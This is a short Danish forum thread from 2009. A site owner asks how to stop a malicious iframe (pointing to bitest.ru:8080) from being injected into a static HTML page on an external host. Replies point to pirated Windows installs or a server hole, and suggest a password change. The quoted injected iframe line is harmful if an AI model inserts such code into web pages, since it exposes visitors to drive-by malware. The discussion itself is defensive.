mboost-dp1

Beskyttelse af server

Gå til bund
Gravatar #1 - XorpiZ
19. sep. 2009 20:11
Mojn

Vi har en lille html-side liggende på et .com domæne. Det eneste siden bliver brugt til, er hosting af billeder. html-siden er ganske simpelt opbygget med lidt tekst og intet andet.

Problemet er, at der nu for 2. gang har sneget sig noget snask ind på siden.

Det ser således ud:

<iframe src="http://bitest.ru:8080/index.php" width=590 height=450 ></iframe>

Jeg vil umiddelbart gætte på, at det bruges til noget DDoS af en art. Men det er nu også sagen uvedkommende. Problemet er at siden er hostet hos en ekstern udbyder, hvor jeg ingen indflydelse har på serveren.

Kan jeg gøre noget herfra for at forhindre, at bots kommer ind og roder i index.html?
Gravatar #2 - Niklas H
19. sep. 2009 20:25
Kører en af jer med en piratkopieret Win7? Der er nogle piratkopier derude, der inficerer html/php filer med en iframe der linker til en "skummel" side.
Gravatar #3 - XorpiZ
19. sep. 2009 20:34
Nilks (2) skrev:
Kører en af jer med en piratkopieret Win7? Der er nogle piratkopier derude, der inficerer html/php filer med en iframe der linker til en "skummel" side.

Nope - filen er oprettet på min arbejdscomputer, der kører XP.

Måske man skulle prøve at skifte passwordet på siden?
Gravatar #4 - Ronson ⅍
20. sep. 2009 01:51
Hvor bliver det hosted?
Gravatar #5 - arne_v
20. sep. 2009 02:14

Hvis jeres site udelukkende består af statiske filer HTML, CSS, GIF, JPG etc. så er det jo ikke et hul i jeres web applikation.

Det må være et hul i sikkerheden på serveren.

Så I skal nok have fat på jeres web hotel.
Gravatar #6 - XorpiZ
20. sep. 2009 09:36
Ronson (4) skrev:
Hvor bliver det hosted?

Hos http://www.omnis.com/

arne_v (5) skrev:

Hvis jeres site udelukkende består af statiske filer HTML, CSS, GIF, JPG etc. så er det jo ikke et hul i jeres web applikation.

Det må være et hul i sikkerheden på serveren.

Så I skal nok have fat på jeres web hotel.

Jeg prøver at kontakte dem. Starter dog med at skifte passwordet i morgen, og så ser vi om de kan få lukket hullet også.
Gå til top

Opret dig som bruger i dag

Det er gratis, og du binder dig ikke til noget.

Når du er oprettet som bruger, får du adgang til en lang række af sidens andre muligheder, såsom at udforme siden efter eget ønske og deltage i diskussionerne.

Opret Bruger Login